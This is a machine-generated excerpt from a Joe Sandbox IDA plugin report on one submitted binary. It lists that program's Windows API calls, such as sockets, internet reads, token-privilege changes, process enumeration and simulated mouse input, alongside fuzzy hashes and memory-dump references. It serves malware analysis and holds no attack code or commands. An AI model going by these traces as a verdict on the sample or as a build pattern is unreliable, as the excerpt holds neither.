                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: 2d53f071aa82da006d174939d15a14c36961c78b3c62edf6cc067302e73ca1e2
                                                                                                                • Instruction ID: 6cf8e905110b58dd8fe26698ab1c1a842ea7376e62567a010d1a86723d4e1d34
                                                                                                                • Opcode Fuzzy Hash: 2d53f071aa82da006d174939d15a14c36961c78b3c62edf6cc067302e73ca1e2
                                                                                                                • Instruction Fuzzy Hash: 2B21D070600600AFCB10EF64CC45A6EB7BBEF48320F148658F85AA73D2C770AD01CB61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
                                                                                                                  • Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01
                                                                                                                • _memmove.LIBCMT ref: 00650258
                                                                                                                • _memmove.LIBCMT ref: 0065036D
                                                                                                                • _memmove.LIBCMT ref: 00650414
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 7e465b072d57475a24ad0852712cf7c48269cac5e593908453b936ea2cf1a3f3
                                                                                                                • Instruction ID: e962a8d074c3fd699061c2bfd1a6b8675b3a01239822ac71ee3269a89e2b36ac
                                                                                                                • Opcode Fuzzy Hash: 7e465b072d57475a24ad0852712cf7c48269cac5e593908453b936ea2cf1a3f3
                                                                                                                • Instruction Fuzzy Hash: FB02B0B0A00609DFDF04DF64D981AAEBBF6EF84300F148069E806DB395EB35D995CB95
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 006019FA
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00601A4E
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00601A61
                                                                                                                  • Part of subcall function 00601290: DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorProc$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3744519093-0
                                                                                                                • Opcode ID: 8417db64f36e17ded44cb249fc6ad292dc78892c4a865f72a4ae3a359143f97d
                                                                                                                • Instruction ID: 41e4f3ab0293627cb7efab881b9eed9f1d8ad13443bea735f34a1531c00eb188
                                                                                                                • Opcode Fuzzy Hash: 8417db64f36e17ded44cb249fc6ad292dc78892c4a865f72a4ae3a359143f97d
                                                                                                                • Instruction Fuzzy Hash: B5A12771292544BAE72DAB688C58EFB355FDF43341F14121EF602DE2D2CB219D4293BA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00677D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00677DB6
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0067679E
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 006767C7
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00676800
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0067680D
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00676821
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 99427753-0
                                                                                                                • Opcode ID: eba8c7cbb6b7a86ab85bde9a990fbddb3b92086fdb4cf558c36d03725713c867
                                                                                                                • Instruction ID: 593c92e37625e4abe3f09660c2a1cb4384f387d0b8996aa5e77c4555fb500a87
                                                                                                                • Opcode Fuzzy Hash: eba8c7cbb6b7a86ab85bde9a990fbddb3b92086fdb4cf558c36d03725713c867
                                                                                                                • Instruction Fuzzy Hash: 3841D1B5A40600AFDB94AF24CC86F6F77AA9F45714F04C55CFA59AB3C3CA709D0087A5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 99c013932fa6e41bebbe405cf5cff636df2a02fbe954a95ff8796d9aff53caf1
                                                                                                                • Instruction ID: aa256e4db0d225360d1a2fd080ebc5e74ba91273ed4b8c1bbe7530ebc5dd0601
                                                                                                                • Opcode Fuzzy Hash: 99c013932fa6e41bebbe405cf5cff636df2a02fbe954a95ff8796d9aff53caf1
                                                                                                                • Instruction Fuzzy Hash: 9D11B231340911ABEB217F26DC44A6B7B9BEF447A1B408639F846D3241EBB09C0187A5
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006580C0
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006580CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006580D9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006580E0
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006580F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                                                                                • Instruction ID: d4f0e56a9bf304849225ed983a131a9258d1b2d74490abb205b9a8ee095cfab5
                                                                                                                • Opcode Fuzzy Hash: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                                                                                • Instruction Fuzzy Hash: DBF04F31240305FFEB204FA5EC8DEA73BAEEF49755F100125F945D7250DA619C55DB60
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00604AD0), ref: 00604B45
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00604B57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                                                                                • Instruction ID: 337b9e34e9a30d50b8b5cea450c637e1e350789792f958f4598086302716e0f4
                                                                                                                • Opcode Fuzzy Hash: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                                                                                • Instruction Fuzzy Hash: E1D01774A50713DFD720AF32E828B4676E6AF45791B12893A94C6D6290EBB4E880CB54
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0067EE3D
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0067EE4B
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0067EF0B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0067EF1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2576544623-0
                                                                                                                • Opcode ID: 27cc85e37a511526993b7d90b5735c94760366f006914a5b1936c3f1800766a4
                                                                                                                • Instruction ID: f1c58e0fc3451b7b85ac1b79b78f9892b2dbad1dd4c3978a56b18c86348750df
                                                                                                                • Opcode Fuzzy Hash: 27cc85e37a511526993b7d90b5735c94760366f006914a5b1936c3f1800766a4
                                                                                                                • Instruction Fuzzy Hash: 6C51C271504700AFD354EF20CC85EABB7EAEF88710F10492DF596972A1EB70E908CB96
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0065E628
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 68926a27438fd72a4dcb5206fb2ae7585dfc8f7d1f2921bf163498d22c9372c6
                                                                                                                • Instruction ID: 35f96696c3c72f12a8a93a9b8d36ac4acb9ac998109ecca3e58842c0a6b88055
                                                                                                                • Opcode Fuzzy Hash: 68926a27438fd72a4dcb5206fb2ae7585dfc8f7d1f2921bf163498d22c9372c6
                                                                                                                • Instruction Fuzzy Hash: 68321575A007059FDB28CF29C4819AAB7F1FF48310B15C56EE89ADB3A1E771A941CB44
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0067180A,00000000), ref: 006723E1
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00672418
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: 117f2b4b0be722f27c448561edf12ec4883d9a1a90bf1363503ef2a008765ade
                                                                                                                • Instruction ID: 485952a1d2f23a8da9d083c060dbddc5cd0222ab3057aafb4ba27f6ddd6fa351
                                                                                                                • Opcode Fuzzy Hash: 117f2b4b0be722f27c448561edf12ec4883d9a1a90bf1363503ef2a008765ade
                                                                                                                • Instruction Fuzzy Hash: F341F67190420AFFEB20DE95DC91EFB77FEEB40324F10806EF649A7241EA749E419A54
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0066B343
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066B39D
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066B3EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: 5f3b0f316d4075a2f9f4c70343dcbb3db54a0c36af1be3dd2f6bb8f698b46d28
                                                                                                                • Instruction ID: da2f4cff2a98f1005ea70d4145ecbd75e7586380040d2162607af313b4af5e68
                                                                                                                • Opcode Fuzzy Hash: 5f3b0f316d4075a2f9f4c70343dcbb3db54a0c36af1be3dd2f6bb8f698b46d28
                                                                                                                • Instruction Fuzzy Hash: 2621A175A00118EFCB00EFA5D885AEEBBBAFF49310F0485AAE905EB351CB319955CB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
                                                                                                                  • Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
                                                                                                                • GetLastError.KERNEL32 ref: 00658865
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922334811-0
                                                                                                                • Opcode ID: 00ca50b2ee9f313091aa6f0eb1fff093b42746ed90d3b9bae2617d2048481e18
                                                                                                                • Instruction ID: 3e2b6d62d54bf14bbc2fd453dd0625936b73594fcd48c65cc14c2fb73a4fcc4d
                                                                                                                • Opcode Fuzzy Hash: 00ca50b2ee9f313091aa6f0eb1fff093b42746ed90d3b9bae2617d2048481e18
                                                                                                                • Instruction Fuzzy Hash: 82119DB2404204AFE718DFA4EC85D6BB7AEEB44311B20852EE89693611EA30AC408B60
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00658774
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0065878B
                                                                                                                • FreeSid.ADVAPI32(?), ref: 0065879B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                                                                                • Instruction ID: aa3b3e7042c7456b74c257bc31048fb28d583567d41539cc7e1e385af1a81476
                                                                                                                • Opcode Fuzzy Hash: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                                                                                • Instruction Fuzzy Hash: ACF06D75A1130CBFDF00DFF4DC99ABEBBBDEF08201F1045A9AA01E2281E7756A448B50
                                                                                                                APIs
                                                                                                                • __time64.LIBCMT ref: 0066889B
                                                                                                                  • Part of subcall function 0062520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00668F6E,00000000,?,?,?,?,0066911F,00000000,?), ref: 00625213
                                                                                                                  • Part of subcall function 0062520A: __aulldiv.LIBCMT ref: 00625233
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                • String ID: 0el
                                                                                                                • API String ID: 2893107130-2275708435
                                                                                                                • Opcode ID: 7cb4bfb82fc867074bb39682d08df62b0af21a6c7e775468fbee32dc40534911
                                                                                                                • Instruction ID: 00e7a5c0836fe4cd5e8d661bab939c2dd42ee88a6ff40f14c0dc5edc21f88edb
                                                                                                                • Opcode Fuzzy Hash: 7cb4bfb82fc867074bb39682d08df62b0af21a6c7e775468fbee32dc40534911
                                                                                                                • Instruction Fuzzy Hash: 7B21A2326256108FC729CF35D841AA2B3E2EBA5311B688F6CE0F5CB2C0CA34A905CB54
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00664CB3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID: DOWN
                                                                                                                • API String ID: 2434400541-711622031
                                                                                                                • Opcode ID: a05ed801e58428589742fae66b27d86e5d608ef4cd889cc3ae24ba1811f833f5
                                                                                                                • Instruction ID: 789602c6c460c3ded71875bb31b517446d2dcbe50d58ec9c4958d2e847497a94
                                                                                                                • Opcode Fuzzy Hash: a05ed801e58428589742fae66b27d86e5d608ef4cd889cc3ae24ba1811f833f5
                                                                                                                • Instruction Fuzzy Hash: AEE04F7119972238E9442518BC02EFB028E8B123357120206FC10D52C1DD411C8225A9
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0066C6FB
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066C72B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: a6a877d815ab360f0e1e153760900e0044212bc1e57ff876e0d8e0361b3b3d06
                                                                                                                • Instruction ID: 3751ca79e4c5536bdf5e475cab60145817185b134c4d36e2310936ca1f6074b8
                                                                                                                • Opcode Fuzzy Hash: a6a877d815ab360f0e1e153760900e0044212bc1e57ff876e0d8e0361b3b3d06
                                                                                                                • Instruction Fuzzy Hash: 09118E726006009FDB10DF29C855A2AF7EAEF85320F00CA1DF8A9C7391DB30AC05CB95
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00679468,?,0068FB84,?), ref: 0066A097
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00679468,?,0068FB84,?), ref: 0066A0A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
